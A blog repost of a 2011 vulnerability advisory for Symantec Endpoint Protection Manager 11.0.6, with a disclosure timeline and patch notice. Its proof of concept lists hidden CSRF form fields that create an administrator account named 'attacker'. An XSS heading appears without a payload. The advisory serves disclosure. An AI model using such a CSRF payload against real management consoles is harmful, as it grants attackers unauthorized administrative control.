Symantec End point Protection Manager Console lets user centrally manages the Symantec End point Protection clients. From the console user can install clients, set and enforce a securit ypolicy, and monitor and report on the clients. The console can be run from the computer hosting Symantec Endpoint Protection Manager or remotely through a Web-based interface.
Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Symantec Endpoint Protection Manager. These issues were discovered in a default installation of Symantec Endpoint Protection Manager 11.0.6. Other earlier versions may also be affected.
Proof of concept
Cross-Site Request Forgery (CSRF)
<input type="hidden" name="spcName" value="attacker" />
<input type="hidden" name="spcUsername" value="attacker" />
<input type="hidden" name="spcNewPwd" value="passwd123" />
<input type="hidden" name="spcNewPwd2" value="passwd123" />
<input type="hidden" name="group1" value="Admin" />
<input type="hidden" name="btnSubmit" value="Create+Account" />
Cross-Site Scripting (XSS)
Symantec has released patches which address these issues. Please see the references for more information.
Vendor URL: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110810_00
2011-03-07 - Vulnerabilities discovered.
2011-03-07 - Vulnerabilities reported to Secunia.
2011-03-09 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-08-10 - Patch released.
2011-08-11 - Advisory published by Secunia.
Post a Comment
Note: Only a member of this blog may post a comment.